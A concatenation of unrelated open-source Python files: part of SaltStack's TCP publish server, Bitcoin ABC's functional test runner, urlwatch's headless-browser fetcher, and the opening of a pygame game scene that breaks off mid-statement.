framed_msg
)
body = framed_msg['body']
if body['enc'] != 'aes':
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
load = crypticle.loads(body['load'])
if six.PY3:
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load['id'], load['tok']):
continue
client.id_ = load['id']
self._add_client_present(client)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s closed, unable to recv', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e:
log.error('Exception parsing response', exc_info=True)
continue
def handle_stream(self, stream, address):
log.trace('Subscriber at %s connected', address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug('TCP PubServer sending payload: %s', package)
payload = salt.transport.frame.frame_msg(package['payload'])
to_remove = []
if 'topic_lst' in package:
topic_lst = package['topic_lst']
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug('Publish target %s not connected', topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug('Subscriber at %s has disconnected from publisher', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state['secrets']
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts,
'secrets': salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get('log_queue')
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get('log_queue_level')
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
def pre_fork(self, process_manager, kwargs=None):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
'''
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
'''
Publish "load" to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Use the Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
# TODO: switch to the actual asynchronous interface
#pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,)
)
pub_sock.connect()
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list' and not self.opts.get("order_masters", False):
if isinstance(load['tgt'], six.string_types):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
else:
int_payload['topic_lst'] = load['tgt']
# Send it over IPC!
pub_sock.send(int_payload)
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, the it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testname --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
"wallet_disableprivatekeys.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status, int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') != None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitoutput', '-J',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formatted test results.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if not test in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t) +
".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from scr_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitoutput,
tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name, runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test script from script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
Returns only test that will not run longer that cutoff.
Long running tests are returned first to favor running tests in parallel
Timings from build directory override those from src directory
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exists are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save test that have passed - timings for failed test might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
|
browser.py
|
# -*- coding: utf-8 -*-
#
# This file is part of urlwatch (https://thp.io/2008/urlwatch/).
# Copyright (c) 2008-2021 Thomas Perl <m@thp.io>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import pyppeteer
import asyncio
import threading
from .cli import setup_logger
logger = logging.getLogger(__name__)
class BrowserLoop(object):
def __init__(self):
self._event_loop = asyncio.new_event_loop()
self._browser = self._event_loop.run_until_complete(self._launch_browser())
self._loop_thread = threading.Thread(target=self._event_loop.run_forever)
self._loop_thread.start()
@asyncio.coroutine
def _launch_browser(self):
browser = yield from pyppeteer.launch()
for p in (yield from browser.pages()):
yield from p.close()
return browser
@asyncio.coroutine
def _get_content(self, url, wait_until=None):
context = yield from self._browser.createIncognitoBrowserContext()
page = yield from context.newPage()
opts = {}
if wait_until is not None:
opts['waitUntil'] = wait_until
yield from page.goto(url, opts)
content = yield from page.content()
yield from context.close()
return content
def process(self, url, wait_until=None):
coroutine = self._get_content(url, wait_until=wait_until)
return asyncio.run_coroutine_threadsafe(coroutine, self._event_loop).result()
def destroy(self):
self._event_loop.call_soon_threadsafe(self._event_loop.stop)
self._loop_thread.join()
self._loop_thread = None
self._event_loop.run_until_complete(self._browser.close())
self._browser = None
self._event_loop = None
class BrowserContext(object):
_BROWSER_LOOP = None
_BROWSER_LOCK = threading.Lock()
_BROWSER_REFCNT = 0
def __init__(self):
with BrowserContext._BROWSER_LOCK:
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Creating browser main loop')
BrowserContext._BROWSER_LOOP = BrowserLoop()
BrowserContext._BROWSER_REFCNT += 1
def process(self, url, wait_until=None):
return BrowserContext._BROWSER_LOOP.process(url, wait_until=wait_until)
def close(self):
with BrowserContext._BROWSER_LOCK:
BrowserContext._BROWSER_REFCNT -= 1
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Destroying browser main loop')
BrowserContext._BROWSER_LOOP.destroy()
BrowserContext._BROWSER_LOOP = None
def main():
import argparse
parser = argparse.ArgumentParser(description='Browser handler')
parser.add_argument('url', help='URL to retrieve')
parser.add_argument('-v', '--verbose', action='store_true', help='show debug output')
parser.add_argument('-w',
'--wait-until',
dest='wait_until',
choices=['load', 'domcontentloaded', 'networkidle0', 'networkidle2'],
help='When to consider a pageload finished')
args = parser.parse_args()
setup_logger(args.verbose)
try:
ctx = BrowserContext()
print(ctx.process(args.url, wait_until=args.wait_until))
finally:
ctx.close()
if __name__ == '__main__':
main()
|
GameScene.py
|
import threading
import time
from pygame import Rect
from engine.Animation import Animation
from engine.const import *
from engine.Obstacle import Obstacle
from engine.Player import Player
from engine.Settings import Settings
from engine.Track import Track
from .Scene import Scene
from .ScoreScene import ScoreScene
class GameScene(Scene):
def _start(self):
"""
Init and start new game scene
:return: None
"""
self.tileset = self.manager.get_image("tileset.png")
self.main_theme_music = self.manager.get_music("main-theme.ogg")
self.explosion_sound = self.manager.get_sound("boom.ogg")
self.width, self.height = pygame.display.get_surface().get_size()
self.track = Track()
self.obstacle = Obstacle(self.track)
self.player = Player(self.track)
self.player.attach()
self.explosion_sprite_size = 192
self.explosion_speed = 4
self.explosion = Animation(self.manager.get_image("explosion.png"),
self.explosion_sprite_size,
